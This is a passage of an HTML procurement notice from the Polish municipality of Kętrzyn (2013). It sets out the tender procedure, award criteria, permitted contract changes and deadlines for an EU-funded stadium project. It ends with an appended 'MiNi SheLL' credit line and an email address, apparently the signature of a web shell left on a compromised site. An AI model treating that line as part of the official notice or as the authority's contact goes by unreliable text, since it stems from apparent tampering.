- pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych
  zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia treści niniejszej umowy, wymagają aneksu podpisanego przez strony umowy, sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności i mogą być dokonane z zastrzeżeniem art. 144 ustawy Prawo zamówień publicznych. 
2. Zamawiający dopuszcza zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących zakresach:

- wydłużenie terminu realizacji zamówienia, w przypadku:
    a)   siły wyższej- zdarzenie zewnętrzne, niemożliwe do przewidzenia i niemożliwe do zapobieżenia, uniemożliwiające realizację zamówienia; 
    b)   czasu trwania procedur administracyjnych, mającego wpływ  obiektywny
niewynikający z opieszałości Wykonawcy, na termin wykonania  zamówienia;
    c)    przerwy w realizacji zamówienia spowodowanej występowaniem warunków
atmosferycznych uniemożliwiających wykonywanie robót, potwierdzonej przez
inspektora nadzoru inwestorskiego wpisem do dziennika budowy;
    d)   uzasadnionego wniosku zamawiającego;

-  zmiany wynagrodzenia Wykonawcy :
a) w przypadku zmiany urzędowej stawki podatku od towarów i usług (VAT) - o  różnicę w wysokości podatku;
b)  w przypadku  zmniejszenia zakresu  zamówienia   -   zmniejszenie o wartość  robót niewykonanych,  ustaloną w oparciu o kosztorys, o którym mowa w § 5 pkt 6;

- zmiany osób i podmiotów zdolnych do wykonania zamówienia, w przypadku:
a)    zdarzeń losowych,
b)   polecenia Zamawiającego;
c)   uzasadnionego wystąpienia Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/ketrzyn_gmina_wiejska/zamowienia_publiczne/110/status/rodzaj/wzp/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kętrzyn
ul. Kościuszki 2
11-400 Kętrzyn

pok.17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2013 godzina 10:00, miejsce: Urząd Gminy Kętrzyn
ul. Kościuszki 2
11-400 Kętrzyn

pok.16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dofinansowanie z : Program Litwa-Polska -  Rosja 2007-2013,
projekt Edukacja sportowa na obszarze przygranicznym - przygotowanie i budowa stadionów sportowych w Gminie Kętrzyn i Oziersk ( Sport education on cross- border territory - preparation and building of sports stadiums in Ketrzyn Communit and Ozyorsk, LPR1/010/126).

Zamawiający nie przewiduje zawarcia umowy ramowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com